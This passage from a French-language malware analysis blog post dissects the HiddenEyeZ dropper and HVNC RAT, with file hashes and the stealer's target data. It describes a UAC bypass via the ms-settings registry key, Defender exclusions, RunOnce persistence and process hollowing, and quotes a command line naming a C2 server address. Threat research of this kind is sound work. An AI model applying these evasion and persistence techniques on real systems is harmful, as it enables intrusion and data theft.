class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">be23cf7d356b13a3f233c6b3d807854e8083bd2d<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">bb86e41bb6d5eccad1ff84ab343506f4f5fcd78b0618966edc0ae0e05fcc8683<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">3072:L6IxdMnKhwoa5riuHNTapbBgn4qBwS7YXzwIjD6ZGsp:pMnKa5rirpbGn4awS7YXzwIjuZGs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Pr\u00e9sentation<\/h4>\n<p>Ce premier sample, nomm\u00e9 Installs.exe, a \u00e9t\u00e9 trouv\u00e9 dans l'un des d\u00e9p\u00f4ts Bitbucket.org \u00e9tudi\u00e9s dans <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\">notre article pr\u00e9c\u00e9dent sur la campagne RedLine<\/a>. Ce binaire a \u00e9t\u00e9 notre point d'entr\u00e9e vers le groupe HiddenEyeZ et son environnement.<\/p>\n<p>Ce sample est un dropper et un RAT ayant pour but principal de d\u00e9ployer des stealers qui se chargeront de collecter les informations sensibles des victimes. De plus, il embarque et d\u00e9ploie le composant principal du malware HiddenEyeZ HVNC. Il poss\u00e8de de nombreuses capacit\u00e9s comme :<\/p>\n<ul>\n<li>le d\u00e9ploiement d'un rootkit\u00a0;<\/li>\n<li>le d\u00e9ploiement d'un stealer\u00a0;<\/li>\n<li>l\u2019\u00e9vasion d'antivirus\u00a0;<\/li>\n<li>la mise en place de persistance\u00a0;<\/li>\n<li>le d\u00e9ploiement du composant principal de HiddenEyeZ HVNC.<\/li>\n<\/ul>\n<p>Les m\u00e9thodes d'infection utilis\u00e9es semblent jouer sur la cr\u00e9dulit\u00e9 des victimes. Les messages sur le salon Telegram d\u2019HiddenEyeZ \u00e9voquent l'utilisation de posts sur les r\u00e9seaux sociaux avec du contenu all\u00e9chant, ayant pour but de mener la victime au t\u00e9l\u00e9chargement d'un pack d'images. Parmi ces images, serait ins\u00e9r\u00e9 un fichier malveillant sous la forme d'un fichier .scr (type de fichiers ex\u00e9cutables sur Windows).<\/p>\n<p>Une autre m\u00e9thode est l'utilisation d'un bot Discord ayant pour but d'usurper le compte d'une victime pour infecter ses contacts et salons fr\u00e9quent\u00e9s.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414082\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 8 : message sur un canal Telegram du groupe HiddenEyeZ annon\u00e7ant un outil d'infection via Discord<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>D\u00e9ploiement d'un rootkit<\/h4>\n<p>Pour s'assurer d\u2019un bon niveau de furtivit\u00e9, le sample a la capacit\u00e9 de d\u00e9ployer un rootkit (outil de dissimulation d'activit\u00e9) en mode utilisateur, nomm\u00e9 r77 (<em>voir la partie\u00ab\u00a0<\/em><em>r77\u00a0\u00bb<\/em>). Le code suivant r\u00e9cup\u00e8re l'installateur du rootkit (rt.jpg) \u00e0 partir d'une URL stock\u00e9e en dur et le place dans un dossier temporaire. Le fichier est ensuite d\u00e9cod\u00e9, ex\u00e9cut\u00e9 et supprim\u00e9 afin d'effacer la trace de son d\u00e9ploiement.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414087\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 9 : code de d\u00e9ploiement du rootkit r77 dans le dropper de HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>D\u00e9ploiement d'un stealer<\/h4>\n<p>Le dropper permet aussi de d\u00e9ployer un stealer connu, que ce soit StormKitty ou Prynt Stealer. Nous ne pouvons pas statuer sur la souche du malware exacte car les deux sont tr\u00e8s proches.<\/p>\n<ul>\n<li>StormKitty est un malware dont les sources sont disponibles publiquement sur GitHub. Il est apparu en 2020 et son d\u00e9veloppement s'est achev\u00e9 durant cette m\u00eame ann\u00e9e.<\/li>\n<li>De son c\u00f4t\u00e9, Prynt Stealer est une \u00e9volution de StormKitty, apparue en 2022 et vendue sur le darknet. Nous avons retrouv\u00e9 parmi les samples \u00e9tudi\u00e9s un builder de Prynt Stealer, ce qui nous fait penser que le stealer d\u00e9ploy\u00e9 serait de ce type.<\/li>\n<\/ul>\n<p>Ce stealer est t\u00e9l\u00e9charg\u00e9 depuis une URL stock\u00e9e en dur sur le d\u00e9p\u00f4t distant sous le nom patata.jpg. Il est alors d\u00e9cod\u00e9 et stock\u00e9 sur le disque dans un dossier temporaire sous le nom svchost.exe. Un script svchost.bat est cr\u00e9\u00e9 pour l'occasion. Il ex\u00e9cute ensuite le stealer, puis s'auto supprime.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414092\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 10 : code de d\u00e9ploiement du stealer dans le dropper de HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Ce stealer permet par exemple de r\u00e9cup\u00e9rer :<\/p>\n<ul>\n<li>des informations du syst\u00e8me (version, CPU, GPU, RAM, IPs, BSSID, localisation, m\u00e9triques de l'\u00e9cran, logiciels install\u00e9s)\u00a0;<\/li>\n<li>des donn\u00e9es g\u00e9r\u00e9es par les navigateurs web (mots de passe, cartes de cr\u00e9dit, cookies, historique, favoris)\u00a0;<\/li>\n<li>des informations sur les r\u00e9seaux Wi-Fi (SSID, BSSID)\u00a0;<\/li>\n<li>des fichiers suivants leur type (documents, images, codes source, base de donn\u00e9es)\u00a0;<\/li>\n<li>les donn\u00e9es permettant de s'identifier \u00e0 une session de logiciels :\n<ul>\n<li>plateformes de jeux (Steam, Uplay, Battle.Net, Minecraft)\u00a0;<\/li>\n<li>logiciels de communication (Telegram, Outlook, Pidgin, Skype, Discord)\u00a0;<\/li>\n<li>Filezilla\u00a0;<\/li>\n<li>VPN (ProtonVPN, OpenVPN, NordVPN)\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>les frappes clavier\u00a0;<\/li>\n<li>les donn\u00e9es stock\u00e9es dans le presse papier\u00a0;<\/li>\n<li>des copies d'\u00e9cran et des images de webcam\u00a0;<\/li>\n<li>des portefeuilles de cryptomonnaies\u00a0;<\/li>\n<li>la liste des processus.<\/li>\n<\/ul>\n<h4>\u00c9vasion d'antivirus<\/h4>\n<p>Afin de ne pas lever d'alarmes, le sample va s'ajouter lui-m\u00eame en exclusion de Windows Defender via la commande Add-MpPreference. Cette action n\u00e9cessitant les droits d'administrateur de la machine, le binaire va utiliser un m\u00e9canisme connu de Bypass d'UAC (Contr\u00f4le d'acc\u00e8s de Windows) via l'utilisation de computerdefaults.exe. La m\u00e9thode consiste \u00e0 placer une commande dans la cl\u00e9 registre <code>HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command<\/code> puis \u00e0 appeler <code>ComputerDefaults.exe<\/code>. La commande sera ex\u00e9cut\u00e9e dans le contexte de ComputerDefaults.exe qui sera lanc\u00e9 en administrateur sans pr\u00e9senter l'interface d'UAC si le compte courant le permet.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414097\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 11 : code de mise en place de l'exclusion de Windows Defender dans le dropper de HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Mise en place de persistance<\/h4>\n<p>Le dropper met en place un moyen de persistance pour s'assurer d'\u00eatre relanc\u00e9 au prochain red\u00e9marrage du syst\u00e8me. Pour cela, il inscrit son ex\u00e9cutable dans la cl\u00e9 de registre <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>. Cette modification de la base de registre est d\u00e9l\u00e9gu\u00e9e \u00e0 un script VBS plac\u00e9 dans <code>%LOCALAPPDATA%\\excecution.vbs<\/code>.<\/p>\n<h4>D\u00e9ploiement du composant principal de HiddenEyeZ HVNC<\/h4>\n<p>Ce sample embarque \u00e9galement un autre module, permettant de r\u00e9aliser les actions typiques d'un RAT : HiddenEyeZ HVNC (<em>voir la partie \u00ab\u00a0HiddenEyeZ HVNC\u00a0\u00bb<\/em>). Il est contenu dans l'ex\u00e9cutable du sample du dropper, doublement encod\u00e9 en base64.<\/p>\n<p>Le malware HiddenEyeZ HVNC est lanc\u00e9 en utilisant une technique de process hollowing. Tout d'abord, l'ex\u00e9cutable cvtres.exe du framework .NET est d\u00e9marr\u00e9 avec l'attribut suspendu. Par la suite, les sections de l'ex\u00e9cutable sont retir\u00e9es de la m\u00e9moire du processus et les donn\u00e9es du module du RAT sont plac\u00e9es en m\u00e9moire. Le processus sort alors de son \u00e9tat de pause pour commencer l'ex\u00e9cution et la m\u00e9thode TryRun impl\u00e9mente le process hollowing.<\/p>\n<p>De cette mani\u00e8re, HiddenEyeZ HVNC apparaitra comme une ex\u00e9cution l\u00e9gitime de cvtres.exe. Dans notre cas, voici la ligne de commande apparente : <code>\"cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE\"<\/code>. On y remarque une r\u00e9f\u00e9rence \u00e0 HiddenEyeZ et \u00e0 l'adresse du serveur de contr\u00f4le. De plus, le dropper d\u00e9marre le RAT dans un bureau Windows secondaire, ce qui permet de cacher \u00e0 l'utilisateur <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winstation\/desktops\" target=\"_blank\" rel=\"noopener\">les actions visuelles r\u00e9alis\u00e9es par HiddenEyeZ HVNC<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414102\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 12 : code de d\u00e9ploiement du composant principal du malware HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>HiddenEyeZ HVNC<\/h3>\n<h4>Carte d'identit\u00e9 du malware<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_1\"\n     id='ninja_table_builder_414278'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_1\"\n     style=\"\n     max-height:900px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414278\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sat Mar 25 03:59:41 2045 | Incoherent<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">3ebd5b7adb726ccd04079e3dc114063b<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">bf84a490838c741631ba641d0fd673f3043a5751<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: 